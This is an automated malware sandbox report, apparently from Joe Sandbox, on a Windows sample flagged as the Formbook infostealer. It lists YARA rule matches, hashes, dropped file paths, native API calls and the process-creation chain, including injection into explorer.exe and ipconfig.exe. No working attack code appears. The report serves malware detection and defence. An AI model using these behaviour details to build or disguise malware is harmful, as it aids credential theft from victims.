Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.iscan.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.iscan.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.358869941.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.359082875.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.510165837.0000000002B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.509923040.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.318358624.000000000EF49000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.509338770.0000000000490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.359171338.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: iscan.exe PID: 5188, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: ipconfig.exe PID: 1916, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
One or more processes crash
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F
Detected potential crypto function
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00406333 0_2_00406333
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Code function: 0_2_00404936 0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0041687D 1_2_0041687D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040B4A4 1_2_0040B4A4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040C1ED 1_2_0040C1ED
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040B9A0 1_2_0040B9A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040BDB8 1_2_0040BDB8
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0040C622 1_2_0040C622
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_0045090D 1_2_0045090D
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 1_2_00450CF2 1_2_00450CF2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004012B0 3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004228B2 3_2_004228B2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004012A4 3_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00421B51 3_2_00421B51
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00421449 3_2_00421449
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004044C7 3_2_004044C7
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004044BE 3_2_004044BE
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0040B522 3_2_0040B522
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0040B527 3_2_0040B527
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004046E7 3_2_004046E7
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0040FF77 3_2_0040FF77
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A520A0 3_2_00A520A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF20A8 3_2_00AF20A8
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3B090 3_2_00A3B090
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF28EC 3_2_00AF28EC
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AFE824 3_2_00AFE824
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A830 3_2_00A4A830
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE1002 3_2_00AE1002
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A499BF 3_2_00A499BF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A44120 3_2_00A44120
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A2F900 3_2_00A2F900
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF22AE 3_2_00AF22AE
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4AEF 3_2_00AE4AEF
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ADFA2B 3_2_00ADFA2B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B236 3_2_00A4B236
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5EBB0 3_2_00A5EBB0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5138B 3_2_00A5138B
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4EB9A 3_2_00A4EB9A
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AD23E3 3_2_00AD23E3
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE03DA 3_2_00AE03DA
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AEDBD2 3_2_00AEDBD2
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A5ABD8 3_2_00A5ABD8
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF2B28 3_2_00AF2B28
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4A309 3_2_00A4A309
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00ACCB4F 3_2_00ACCB4F
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4AB40 3_2_00A4AB40
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE4496 3_2_00AE4496
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3841F 3_2_00A3841F
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AED466 3_2_00AED466
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A4B477 3_2_00A4B477
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A52581 3_2_00A52581
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AE2D82 3_2_00AE2D82
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A3D5E0 3_2_00A3D5E0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF25DD 3_2_00AF25DD
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A20D20 3_2_00A20D20
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF2D07 3_2_00AF2D07
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF1D55 3_2_00AF1D55
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF2EF7 3_2_00AF2EF7
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A46E30 3_2_00A46E30
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AED616 3_2_00AED616
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AF1FF1 3_2_00AF1FF1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00AFDFCE 3_2_00AFDFCE
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: String function: 00A2B150 appears 139 times
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0041E047 NtReadFile, 3_2_0041E047
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0041E0C7 NtClose, 3_2_0041E0C7
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0041E177 NtAllocateVirtualMemory, 3_2_0041E177
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory, 3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0041DF97 NtCreateFile, 3_2_0041DF97
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0041E041 NtReadFile, 3_2_0041E041
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0041E0C1 NtClose, 3_2_0041E0C1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_0041E171 NtAllocateVirtualMemory, 3_2_0041E171
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004012A4 NtProtectVirtualMemory, 3_2_004012A4
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_004014E9 NtProtectVirtualMemory, 3_2_004014E9
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A698F0 NtReadVirtualMemory,LdrInitializeThunk, 3_2_00A698F0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69860 NtQuerySystemInformation,LdrInitializeThunk, 3_2_00A69860
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69840 NtDelayExecution,LdrInitializeThunk, 3_2_00A69840
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A699A0 NtCreateSection,LdrInitializeThunk, 3_2_00A699A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69910 NtAdjustPrivilegesToken,LdrInitializeThunk, 3_2_00A69910
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69A20 NtResumeThread,LdrInitializeThunk, 3_2_00A69A20
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69A00 NtProtectVirtualMemory,LdrInitializeThunk, 3_2_00A69A00
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69A50 NtCreateFile,LdrInitializeThunk, 3_2_00A69A50
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A695D0 NtClose,LdrInitializeThunk, 3_2_00A695D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69540 NtReadFile,LdrInitializeThunk, 3_2_00A69540
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A696E0 NtFreeVirtualMemory,LdrInitializeThunk, 3_2_00A696E0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69660 NtAllocateVirtualMemory,LdrInitializeThunk, 3_2_00A69660
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A697A0 NtUnmapViewOfSection,LdrInitializeThunk, 3_2_00A697A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69780 NtMapViewOfSection,LdrInitializeThunk, 3_2_00A69780
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69FE0 NtCreateMutant,LdrInitializeThunk, 3_2_00A69FE0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69710 NtQueryInformationToken,LdrInitializeThunk, 3_2_00A69710
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A698A0 NtWriteVirtualMemory, 3_2_00A698A0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69820 NtEnumerateKey, 3_2_00A69820
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A6B040 NtSuspendThread, 3_2_00A6B040
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A699D0 NtCreateProcessEx, 3_2_00A699D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69950 NtQueueApcThread, 3_2_00A69950
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69A80 NtOpenDirectoryObject, 3_2_00A69A80
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69A10 NtQuerySection, 3_2_00A69A10
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A6A3B0 NtGetContextThread, 3_2_00A6A3B0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69B00 NtSetValueKey, 3_2_00A69B00
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A695F0 NtQueryInformationFile, 3_2_00A695F0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69520 NtWaitForSingleObject, 3_2_00A69520
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A6AD30 NtSetContextThread, 3_2_00A6AD30
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69560 NtWriteFile, 3_2_00A69560
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A696D0 NtCreateKey, 3_2_00A696D0
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69610 NtEnumerateValueKey, 3_2_00A69610
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69670 NtQueryInformationProcess, 3_2_00A69670
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69650 NtQueryValueKey, 3_2_00A69650
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69730 NtQueryVirtualMemory, 3_2_00A69730
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A6A710 NtOpenProcessToken, 3_2_00A6A710
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69760 NtOpenProcess, 3_2_00A69760
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A69770 NtSetInformationFile, 3_2_00A69770
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Code function: 3_2_00A6A770 NtOpenThread, 3_2_00A6A770
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\iscan.exe A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe A4C4BF78E737CCADBABF71B57E5676A846D9ADFC5442344EDA8267325223B964
Source: PrWP76ejHO.exe ReversingLabs: Detection: 73%
Source: PrWP76ejHO.exe Virustotal: Detection: 32%
Source: C:\Users\user\Desktop\PrWP76ejHO.exe File read: C:\Users\user\Desktop\PrWP76ejHO.exe Jump to behavior
Source: PrWP76ejHO.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\PrWP76ejHO.exe C:\Users\user\Desktop\PrWP76ejHO.exe
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Process created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4468 -s 452
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 420
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Process created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\iscan.exe Process created: C:\Users\user\AppData\Local\Temp\iscan.exe "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Local\Temp\zxtnbfvzh.c Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe "C:\Users\user\AppData\Roaming\iidryiceixqa\iijhlev.exe" "C:\Users\user\AppData\Local\Temp\iscan.exe" C:\Users\user\AppData\Loca Jump to behavior
Source: C:\Users\user\Desktop\PrWP76ejHO.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
